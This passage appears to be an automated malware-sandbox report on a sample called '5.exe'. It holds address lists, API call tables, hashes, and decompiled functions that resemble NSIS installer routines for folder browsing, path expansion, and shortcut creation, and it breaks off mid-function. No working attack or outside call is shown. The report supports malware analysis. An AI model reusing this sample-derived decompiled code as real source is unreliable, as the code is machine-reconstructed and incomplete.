                                                                                              0x00404780
                                                                                              0x0040484a
                                                                                              0x0040485d
                                                                                              0x00000000
                                                                                              0x00404786
                                                                                              0x00404789
                                                                                              0x0040478c
                                                                                              0x0040478f
                                                                                              0x0040478f
                                                                                              0x00404795
                                                                                              0x0040479b
                                                                                              0x0040479e
                                                                                              0x004047a4
                                                                                              0x004047a5
                                                                                              0x004047aa
                                                                                              0x004047b3
                                                                                              0x004047ba
                                                                                              0x004047bd
                                                                                              0x004047c0
                                                                                              0x004047c3
                                                                                              0x004047fd
                                                                                              0x004047ff
                                                                                              0x00404828
                                                                                              0x00404801
                                                                                              0x0040480e
                                                                                              0x0040480e
                                                                                              0x004047c5
                                                                                              0x004047c8
                                                                                              0x004047d7
                                                                                              0x004047e1
                                                                                              0x004047e9
                                                                                              0x004047f0
                                                                                              0x004047f8
                                                                                              0x004047f8
                                                                                              0x004047c3
                                                                                              0x0040482e
                                                                                              0x0040482f
                                                                                              0x00404835
                                                                                              0x0040483b
                                                                                              0x0040483b
                                                                                              0x00404848
                                                                                              0x00404863
                                                                                              0x00404867
                                                                                              0x00404884
                                                                                              0x00404889
                                                                                              0x0040488c
                                                                                              0x0040488c
                                                                                              0x00000000
                                                                                              0x00404869
                                                                                              0x0040486e
                                                                                              0x00404877
                                                                                              0x00404c04
                                                                                              0x00404c16
                                                                                              0x00404c16
                                                                                              0x00404867
                                                                                              0x00000000
                                                                                              0x00404848
                                                                                              0x00404780

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                              • String ID: $M$N$`Ae
                                                                                              • API String ID: 1638840714-4108015562
                                                                                              • Opcode ID: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                                                                                              • Instruction ID: c130209c976f96ebc92895edf0e38420b46f59adec9cf70198d20430cf8fc3c6
                                                                                              • Opcode Fuzzy Hash: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                                                                                              • Instruction Fuzzy Hash: 1E02AEB0A00209AFDB20DF95DD45AAE7BB5FB84314F10817AF611BA2E1C7789D42CF58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 78%
                                                                                              			E0040411B(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                              				signed int _v8;
                                                                                              				struct HWND__* _v12;
                                                                                              				long _v16;
                                                                                              				long _v20;
                                                                                              				char _v24;
                                                                                              				long _v28;
                                                                                              				char _v32;
                                                                                              				intOrPtr _v36;
                                                                                              				long _v40;
                                                                                              				signed int _v44;
                                                                                              				CHAR* _v52;
                                                                                              				intOrPtr _v56;
                                                                                              				intOrPtr _v60;
                                                                                              				intOrPtr _v64;
                                                                                              				CHAR* _v68;
                                                                                              				void _v72;
                                                                                              				char _v76;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t81;
                                                                                              				long _t86;
                                                                                              				signed char* _t88;
                                                                                              				void* _t94;
                                                                                              				signed int _t95;
                                                                                              				signed short _t113;
                                                                                              				signed int _t117;
                                                                                              				char* _t122;
                                                                                              				intOrPtr _t124;
                                                                                              				intOrPtr* _t138;
                                                                                              				signed int* _t145;
                                                                                              				intOrPtr _t147;
                                                                                              				signed int _t148;
                                                                                              				signed int _t153;
                                                                                              				struct HWND__* _t159;
                                                                                              				CHAR* _t162;
                                                                                              				int _t163;
                                                                                              
                                                                                              				_t81 =  *0x4297a8;
                                                                                              				_v36 = _t81;
                                                                                              				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x42f000;
                                                                                              				_v8 =  *((intOrPtr*)(_t81 + 0x38));
                                                                                              				if(_a8 == 0x40b) {
                                                                                              					E004051D0(0x3fb, _t162);
                                                                                              					E00405B89(_t162);
                                                                                              				}
                                                                                              				if(_a8 != 0x110) {
                                                                                              					L8:
                                                                                              					if(_a8 != 0x111) {
                                                                                              						L20:
                                                                                              						if(_a8 == 0x40f) {
                                                                                              							L22:
                                                                                              							_v8 = _v8 & 0x00000000;
                                                                                              							_v12 = _v12 & 0x00000000;
                                                                                              							E004051D0(0x3fb, _t162);
                                                                                              							if(E004054FF(_t180, _t162) == 0) {
                                                                                              								_v8 = 1;
                                                                                              							}
                                                                                              							E0040592B(0x428fa0, _t162);
                                                                                              							_t145 = 0;
                                                                                              							_t86 = E00405C49(0);
                                                                                              							_v16 = _t86;
                                                                                              							if(_t86 == 0) {
                                                                                              								L31:
                                                                                              								E0040592B(0x428fa0, _t162);
                                                                                              								_t88 = E004054B2(0x428fa0);
                                                                                              								if(_t88 != _t145) {
                                                                                              									 *_t88 =  *_t88 & 0x00000000;
                                                                                              								}
                                                                                              								if(GetDiskFreeSpaceA(0x428fa0,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                                                                                              									_t153 = _a8;
                                                                                              									goto L37;
                                                                                              								} else {
                                                                                              									_t163 = 0x400;
                                                                                              									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
                                                                                              									_v12 = 1;
                                                                                              									goto L38;
                                                                                              								}
                                                                                              							} else {
                                                                                              								if(0 == 0x428fa0) {
                                                                                              									L30:
                                                                                              									_t145 = 0;
                                                                                              									goto L31;
                                                                                              								} else {
                                                                                              									goto L26;
                                                                                              								}
                                                                                              								while(1) {
                                                                                              									L26:
                                                                                              									_t113 = _v16(0x428fa0,  &_v44,  &_v24,  &_v32);
                                                                                              									if(_t113 != 0) {
                                                                                              										break;
                                                                                              									}
                                                                                              									if(_t145 != 0) {
                                                                                              										 *_t145 =  *_t145 & _t113;
                                                                                              									}
                                                                                              									_t145 = E00405465(0x428fa0) - 1;
                                                                                              									 *_t145 = 0x5c;
                                                                                              									if(_t145 != 0x428fa0) {
                                                                                              										continue;
                                                                                              									} else {
                                                                                              										goto L30;
                                                                                              									}
                                                                                              								}
                                                                                              								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
                                                                                              								_v12 = 1;
                                                                                              								_t145 = 0;
                                                                                              								L37:
                                                                                              								_t163 = 0x400;
                                                                                              								L38:
                                                                                              								_t94 = E0040456B(5);
                                                                                              								if(_v12 != _t145 && _t153 < _t94) {
                                                                                              									_v8 = 2;
                                                                                              								}
                                                                                              								_t147 =  *0x42e33c; // 0x65aa00
                                                                                              								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
                                                                                              									E004044B6(0x3ff, 0xfffffffb, _t94);
                                                                                              									if(_v12 == _t145) {
                                                                                              										SetDlgItemTextA(_a4, _t163, 0x428f90);
                                                                                              									} else {
                                                                                              										E004044B6(_t163, 0xfffffffc, _t153);
                                                                                              									}
                                                                                              								}
                                                                                              								_t95 = _v8;
                                                                                              								 *0x42ec04 = _t95;
                                                                                              								if(_t95 == _t145) {
                                                                                              									_v8 = E0040140B(7);
                                                                                              								}
                                                                                              								if(( *(_v36 + 0x14) & _t163) != 0) {
                                                                                              									_v8 = _t145;
                                                                                              								}
                                                                                              								E00403CFF(0 | _v8 == _t145);
                                                                                              								if(_v8 == _t145 &&  *0x429fc4 == _t145) {
                                                                                              									E004040B0();
                                                                                              								}
                                                                                              								 *0x429fc4 = _t145;
                                                                                              								goto L53;
                                                                                              							}
                                                                                              						}
                                                                                              						_t180 = _a8 - 0x405;
                                                                                              						if(_a8 != 0x405) {
                                                                                              							goto L53;
                                                                                              						}
                                                                                              						goto L22;
                                                                                              					}
                                                                                              					_t117 = _a12 & 0x0000ffff;
                                                                                              					if(_t117 != 0x3fb) {
                                                                                              						L12:
                                                                                              						if(_t117 == 0x3e9) {
                                                                                              							_t148 = 7;
                                                                                              							memset( &_v72, 0, _t148 << 2);
                                                                                              							_v76 = _a4;
                                                                                              							_v68 = 0x429fd8;
                                                                                              							_v56 = E00404450;
                                                                                              							_v52 = _t162;
                                                                                              							_v64 = E0040594D(0x3fb, 0x429fd8, _t162, 0x4293a8, _v8);
                                                                                              							_t122 =  &_v76;
                                                                                              							_v60 = 0x41;
                                                                                              							__imp__SHBrowseForFolderA(_t122);
                                                                                              							if(_t122 == 0) {
                                                                                              								_a8 = 0x40f;
                                                                                              							} else {
                                                                                              								__imp__CoTaskMemFree(_t122);
                                                                                              								E0040541E(_t162);
                                                                                              								_t124 =  *0x42eb70; // 0x654160
                                                                                              								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
                                                                                              								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
                                                                                              									E0040594D(0x3fb, 0x429fd8, _t162, 0, _t125);
                                                                                              									if(lstrcmpiA(0x42db00, 0x429fd8) != 0) {
                                                                                              										lstrcatA(_t162, 0x42db00);
                                                                                              									}
                                                                                              								}
                                                                                              								 *0x429fc4 =  &(( *0x429fc4)[0]);
                                                                                              								SetDlgItemTextA(_a4, 0x3fb, _t162);
                                                                                              							}
                                                                                              						}
                                                                                              						goto L20;
                                                                                              					}
                                                                                              					if(_a12 >> 0x10 != 0x300) {
                                                                                              						goto L53;
                                                                                              					}
                                                                                              					_a8 = 0x40f;
                                                                                              					goto L12;
                                                                                              				} else {
                                                                                              					_t159 = _a4;
                                                                                              					_v12 = GetDlgItem(_t159, 0x3fb);
                                                                                              					if(E0040548B(_t162) != 0 && E004054B2(_t162) == 0) {
                                                                                              						E0040541E(_t162);
                                                                                              					}
                                                                                              					 *0x42e338 = _t159;
                                                                                              					SetWindowTextA(_v12, _t162);
                                                                                              					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                              					_push(1);
                                                                                              					E00403CDD(_t159);
                                                                                              					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                              					_push(0x14);
                                                                                              					E00403CDD(_t159);
                                                                                              					E00403D12(_v12);
                                                                                              					_t138 = E00405C49(7);
                                                                                              					if(_t138 == 0) {
                                                                                              						L53:
                                                                                              						return E00403D44(_a8, _a12, _a16);
                                                                                              					}
                                                                                              					 *_t138(_v12, 1);
                                                                                              					goto L8;
                                                                                              				}
                                                                                              			}


                                                                                              APIs
                                                                                              • GetDlgItem.USER32 ref: 00404167
                                                                                              • SetWindowTextA.USER32(?,?), ref: 00404194
                                                                                              • SHBrowseForFolderA.SHELL32(?,004293A8,?), ref: 00404249
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404254
                                                                                              • lstrcmpiA.KERNEL32(ivvzb,00429FD8,00000000,?,?), ref: 00404286
                                                                                              • lstrcatA.KERNEL32(?,ivvzb), ref: 00404292
                                                                                              • SetDlgItemTextA.USER32 ref: 004042A2
                                                                                                • Part of subcall function 004051D0: GetDlgItemTextA.USER32 ref: 004051E3
                                                                                                • Part of subcall function 00405B89: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                                                                                • Part of subcall function 00405B89: CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                                                                                • Part of subcall function 00405B89: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                                                                                • Part of subcall function 00405B89: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                                                                              • GetDiskFreeSpaceA.KERNEL32(00428FA0,?,?,0000040F,?,00428FA0,00428FA0,?,00000000,00428FA0,?,?,000003FB,?), ref: 0040435B
                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404376
                                                                                              • SetDlgItemTextA.USER32 ref: 004043EF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                              • String ID: A$C:\Users\user\AppData\Local\Temp$`Ae$ivvzb
                                                                                              • API String ID: 2246997448-1835872293
                                                                                              • Opcode ID: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                                                                                              • Instruction ID: a19ed3a57cd3ea7516059bd6de19f3cb3834a8abb31794935fb739ca8bc8323d
                                                                                              • Opcode Fuzzy Hash: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                                                                                              • Instruction Fuzzy Hash: E09151B1A00218ABDB11DFA1DD85AEF7BB8EF84315F10407BFA04B62D1D77C99418B69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 74%
                                                                                              			E0040594D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                              				signed int _v8;
                                                                                              				struct _ITEMIDLIST* _v12;
                                                                                              				signed int _v16;
                                                                                              				signed char _v20;
                                                                                              				signed char _v24;
                                                                                              				signed int _v28;
                                                                                              				signed int _t36;
                                                                                              				CHAR* _t37;
                                                                                              				signed char _t39;
                                                                                              				signed int _t40;
                                                                                              				int _t41;
                                                                                              				char _t51;
                                                                                              				char _t52;
                                                                                              				char _t54;
                                                                                              				char _t56;
                                                                                              				void* _t64;
                                                                                              				signed int _t68;
                                                                                              				intOrPtr _t72;
                                                                                              				signed int _t73;
                                                                                              				signed char _t74;
                                                                                              				intOrPtr _t77;
                                                                                              				char _t81;
                                                                                              				void* _t83;
                                                                                              				CHAR* _t84;
                                                                                              				void* _t86;
                                                                                              				signed int _t93;
                                                                                              				signed int _t95;
                                                                                              				void* _t96;
                                                                                              
                                                                                              				_t86 = __esi;
                                                                                              				_t83 = __edi;
                                                                                              				_t64 = __ebx;
                                                                                              				_t36 = _a8;
                                                                                              				if(_t36 < 0) {
                                                                                              					_t77 =  *0x42e33c; // 0x65aa00
                                                                                              					_t36 =  *(_t77 - 4 + _t36 * 4);
                                                                                              				}
                                                                                              				_t72 =  *0x42eb98; // 0x6590c0
                                                                                              				_t73 = _t72 + _t36;
                                                                                              				_t37 = 0x42db00;
                                                                                              				_push(_t64);
                                                                                              				_push(_t86);
                                                                                              				_push(_t83);
                                                                                              				_t84 = 0x42db00;
                                                                                              				if(_a4 - 0x42db00 < 0x800) {
                                                                                              					_t84 = _a4;
                                                                                              					_a4 = _a4 & 0x00000000;
                                                                                              				}
                                                                                              				while(1) {
                                                                                              					_t81 =  *_t73;
                                                                                              					if(_t81 == 0) {
                                                                                              						break;
                                                                                              					}
                                                                                              					__eflags = _t84 - _t37 - 0x400;
                                                                                              					if(_t84 - _t37 >= 0x400) {
                                                                                              						break;
                                                                                              					}
                                                                                              					_t73 = _t73 + 1;
                                                                                              					__eflags = _t81 - 0xfc;
                                                                                              					_a8 = _t73;
                                                                                              					if(__eflags <= 0) {
                                                                                              						if(__eflags != 0) {
                                                                                              							 *_t84 = _t81;
                                                                                              							_t84 =  &(_t84[1]);
                                                                                              							__eflags = _t84;
                                                                                              						} else {
                                                                                              							 *_t84 =  *_t73;
                                                                                              							_t84 =  &(_t84[1]);
                                                                                              							_t73 = _t73 + 1;
                                                                                              						}
                                                                                              						continue;
                                                                                              					}
                                                                                              					_t39 =  *(_t73 + 1);
                                                                                              					_t74 =  *_t73;
                                                                                              					_a8 = _a8 + 2;
                                                                                              					_v20 = _t39;
                                                                                              					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
                                                                                              					_t68 = _t74;
                                                                                              					_t40 = _t39 | 0x00000080;
                                                                                              					__eflags = _t81 - 0xfe;
                                                                                              					_v28 = _t68;
                                                                                              					_v24 = _t74 | 0x00000080;
                                                                                              					_v16 = _t40;
                                                                                              					if(_t81 != 0xfe) {
                                                                                              						__eflags = _t81 - 0xfd;
                                                                                              						if(_t81 != 0xfd) {
                                                                                              							__eflags = _t81 - 0xff;
                                                                                              							if(_t81 == 0xff) {
                                                                                              								__eflags = (_t40 | 0xffffffff) - _t93;
                                                                                              								E0040594D(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
                                                                                              							}
                                                                                              							L41:
                                                                                              							_t41 = lstrlenA(_t84);
                                                                                              							_t73 = _a8;
                                                                                              							_t84 =  &(_t84[_t41]);
                                                                                              							_t37 = 0x42db00;
                                                                                              							continue;
                                                                                              						}
                                                                                              						__eflags = _t93 - 0x1d;
                                                                                              						if(_t93 != 0x1d) {
                                                                                              							__eflags = (_t93 << 0xa) + 0x42f000;
                                                                                              							E0040592B(_t84, (_t93 << 0xa) + 0x42f000);
                                                                                              						} else {
                                                                                              							E00405889(_t84,  *0x42eb68);
                                                                                              						}
                                                                                              						__eflags = _t93 + 0xffffffeb - 7;
                                                                                              						if(_t93 + 0xffffffeb < 7) {
                                                                                              							L32:
                                                                                              							E00405B89(_t84);
                                                                                              						}
                                                                                              						goto L41;
                                                                                              					}
                                                                                              					_t95 = 2;
                                                                                              					_t51 = GetVersion();
                                                                                              					__eflags = _t51;
                                                                                              					if(_t51 >= 0) {
                                                                                              						L12:
                                                                                              						_v8 = 1;
                                                                                              						L13:
                                                                                              						__eflags =  *0x42ebe4;
                                                                                              						if( *0x42ebe4 != 0) {
                                                                                              							_t95 = 4;
                                                                                              						}
                                                                                              						__eflags = _t68;
                                                                                              						if(_t68 >= 0) {
                                                                                              							__eflags = _t68 - 0x25;
                                                                                              							if(_t68 != 0x25) {
                                                                                              								__eflags = _t68 - 0x24;
                                                                                              								if(_t68 == 0x24) {
                                                                                              									GetWindowsDirectoryA(_t84, 0x400);
                                                                                              									_t95 = 0;
                                                                                              								}
                                                                                              								while(1) {
                                                                                              									__eflags = _t95;
                                                                                              									if(_t95 == 0) {
                                                                                              										goto L29;
                                                                                              									}
                                                                                              									_t52 =  *0x42eb64; // 0x74261340
                                                                                              									_t95 = _t95 - 1;
                                                                                              									__eflags = _t52;
                                                                                              									if(_t52 == 0) {
                                                                                              										L25:
                                                                                              										_t54 = SHGetSpecialFolderLocation( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
                                                                                              										__eflags = _t54;
                                                                                              										if(_t54 != 0) {
                                                                                              											L27:
                                                                                              											 *_t84 =  *_t84 & 0x00000000;
                                                                                              											__eflags =  *_t84;
                                                                                              											continue;
                                                                                              										}
                                                                                              										__imp__SHGetPathFromIDListA(_v12, _t84);
                                                                                              										__imp__CoTaskMemFree(_v12);
                                                                                              										__eflags = _t54;
                                                                                              										if(_t54 != 0) {
                                                                                              											goto L29;
                                                                                              										}
                                                                                              										goto L27;
                                                                                              									}
                                                                                              									__eflags = _v8;
                                                                                              									if(_v8 == 0) {
                                                                                              										goto L25;
                                                                                              									}
                                                                                              									_t56 =  *_t52( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
                                                                                              									__eflags = _t56;
                                                                                              									if(_t56 == 0) {
                                                                                              										goto L29;
                                                                                              									}
                                                                                              									goto L25;
                                                                                              								}
                                                                                              								goto L29;
                                                                                              							}
                                                                                              							GetSystemDirectoryA(_t84, 0x400);
                                                                                              							goto L29;
                                                                                              						} else {
                                                                                              							_t71 = (_t68 & 0x0000003f) +  *0x42eb98;
                                                                                              							E00405812(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x42eb98, _t84, _t68 & 0x00000040);
                                                                                              							__eflags =  *_t84;
                                                                                              							if( *_t84 != 0) {
                                                                                              								L30:
                                                                                              								__eflags = _v20 - 0x1a;
                                                                                              								if(_v20 == 0x1a) {
                                                                                              									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                              								}
                                                                                              								goto L32;
                                                                                              							}
                                                                                              							E0040594D(_t71, _t84, _t95, _t84, _v20);
                                                                                              							L29:
                                                                                              							__eflags =  *_t84;
                                                                                              							if( *_t84 == 0) {
                                                                                              								goto L32;
                                                                                              							}
                                                                                              							goto L30;
                                                                                              						}
                                                                                              					}
                                                                                              					__eflags = _t51 - 0x5a04;
                                                                                              					if(_t51 == 0x5a04) {
                                                                                              						goto L12;
                                                                                              					}
                                                                                              					__eflags = _v20 - 0x23;
                                                                                              					if(_v20 == 0x23) {
                                                                                              						goto L12;
                                                                                              					}
                                                                                              					__eflags = _v20 - 0x2e;
                                                                                              					if(_v20 == 0x2e) {
                                                                                              						goto L12;
                                                                                              					} else {
                                                                                              						_v8 = _v8 & 0x00000000;
                                                                                              						goto L13;
                                                                                              					}
                                                                                              				}
                                                                                              				 *_t84 =  *_t84 & 0x00000000;
                                                                                              				if(_a4 == 0) {
                                                                                              					return _t37;
                                                                                              				}
                                                                                              				return E0040592B(_a4, _t37);
                                                                                              			}































                                                                                              0x00405afc
                                                                                              0x00405afc
                                                                                              0x00000000
                                                                                              0x00405b32
                                                                                              0x004059f0
                                                                                              0x004059f1
                                                                                              0x004059f7
                                                                                              0x004059f9
                                                                                              0x00405a13
                                                                                              0x00405a13
                                                                                              0x00405a1a
                                                                                              0x00405a1a
                                                                                              0x00405a21
                                                                                              0x00405a25
                                                                                              0x00405a25
                                                                                              0x00405a26
                                                                                              0x00405a28
                                                                                              0x00405a61
                                                                                              0x00405a64
                                                                                              0x00405a74
                                                                                              0x00405a77
                                                                                              0x00405a7f
                                                                                              0x00405a85
                                                                                              0x00405a85
                                                                                              0x00405ae1
                                                                                              0x00405ae1
                                                                                              0x00405ae3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405a89
                                                                                              0x00405a90
                                                                                              0x00405a91
                                                                                              0x00405a93
                                                                                              0x00405aad
                                                                                              0x00405abb
                                                                                              0x00405ac1
                                                                                              0x00405ac3
                                                                                              0x00405ade
                                                                                              0x00405ade
                                                                                              0x00405ade
                                                                                              0x00000000
                                                                                              0x00405ade
                                                                                              0x00405ac9
                                                                                              0x00405ad4
                                                                                              0x00405ada
                                                                                              0x00405adc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405adc
                                                                                              0x00405a95
                                                                                              0x00405a98
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405aa7
                                                                                              0x00405aa9
                                                                                              0x00405aab
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405aab
                                                                                              0x00000000
                                                                                              0x00405ae1
                                                                                              0x00405a6c
                                                                                              0x00000000
                                                                                              0x00405a2a
                                                                                              0x00405a2f
                                                                                              0x00405a45
                                                                                              0x00405a4a
                                                                                              0x00405a4d
                                                                                              0x00405aea
                                                                                              0x00405aea
                                                                                              0x00405aee
                                                                                              0x00405af6
                                                                                              0x00405af6
                                                                                              0x00000000
                                                                                              0x00405aee
                                                                                              0x00405a57
                                                                                              0x00405ae5
                                                                                              0x00405ae5
                                                                                              0x00405ae8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405ae8
                                                                                              0x00405a28
                                                                                              0x004059fb
                                                                                              0x004059ff
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405a01
                                                                                              0x00405a05
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405a07
                                                                                              0x00405a0b
                                                                                              0x00000000
                                                                                              0x00405a0d
                                                                                              0x00405a0d
                                                                                              0x00000000
                                                                                              0x00405a0d
                                                                                              0x00405a0b
                                                                                              0x00405b70
                                                                                              0x00405b7a
                                                                                              0x00405b86
                                                                                              0x00405b86
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetVersion.KERNEL32(00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 004059F1
                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00405A6C
                                                                                              • GetWindowsDirectoryA.KERNEL32(ivvzb,00000400), ref: 00405A7F
                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,0041B694), ref: 00405ABB
                                                                                              • SHGetPathFromIDListA.SHELL32(0041B694,ivvzb), ref: 00405AC9
                                                                                              • CoTaskMemFree.OLE32(0041B694), ref: 00405AD4
                                                                                              • lstrcatA.KERNEL32(ivvzb,\Microsoft\Internet Explorer\Quick Launch), ref: 00405AF6
                                                                                              • lstrlenA.KERNEL32(ivvzb,00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 00405B48
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$ivvzb
                                                                                              • API String ID: 900638850-70652549
                                                                                              • Opcode ID: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                                                                                              • Instruction ID: df3d1b2a2a9ff386ea366cfb08fccb3f72b75f9b6d2186fcd2ce51f7d99f39fa
                                                                                              • Opcode Fuzzy Hash: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                                                                                              • Instruction Fuzzy Hash: 83510071A00A05AADF20AB65DC84BBF3BB4EB55724F14423BE911B62D0D33C6942DF5E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 74%
                                                                                              			E00402012() {
                                                                                              				void* _t44;
                                                                                              				intOrPtr* _t48;
                                                                                              				intOrPtr* _t50;
                                                                                              				intOrPtr* _t52;
                                                                                              				intOrPtr* _t54;
                                                                                              				signed int _t58;
                                                                                              				intOrPtr* _t59;
                                                                                              				intOrPtr* _t62;
                                                                                              				intOrPtr* _t64;
                                                                                              				intOrPtr* _t66;
                                                                                              				intOrPtr* _t69;
                                                                                              				intOrPtr* _t71;
                                                                                              				int _t75;
                                                                                              				signed int _t81;
                                                                                              				intOrPtr* _t88;
                                                                                              				void* _t95;
                                                                                              				void* _t96;
                                                                                              				void* _t100;
                                                                                              
                                                                                              				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
                                                                                              				_t96 = E004029E8(0xffffffdf);
                                                                                              				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
                                                                                              				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
                                                                                              				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
                                                                                              				if(E0040548B(_t96) == 0) {
                                                                                              					E004029E8(0x21);
                                                                                              				}
                                                                                              				_t44 = _t100 + 8;
                                                                                              				__imp__CoCreateInstance(0x407490, _t75, 1, 0x407480, _t44);
                                                                                              				if(_t44 < _t75) {
                                                                                              					L13:
                                                                                              					 *((intOrPtr*)(_t100 - 4)) = 1;
                                                                                              					_push(0xfffffff0);
                                                                                              				} else {
                                                                                              					_t48 =  *((intOrPtr*)(_t100 + 8));
                                                                                              					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4074a0, _t100 - 0x34);
                                                                                              					if(_t95 >= _t75) {
                                                                                              						_t52 =  *((intOrPtr*)(_t100 + 8));
                                                                                              						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                                                                              						_t54 =  *((intOrPtr*)(_t100 + 8));
                                                                                              						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\alfons\\AppData\\Local\\Temp");
                                                                                              						_t81 =  *(_t100 - 0x14);
                                                                                              						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                                                                              						if(_t58 != 0) {
                                                                                              							_t88 =  *((intOrPtr*)(_t100 + 8));
                                                                                              							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
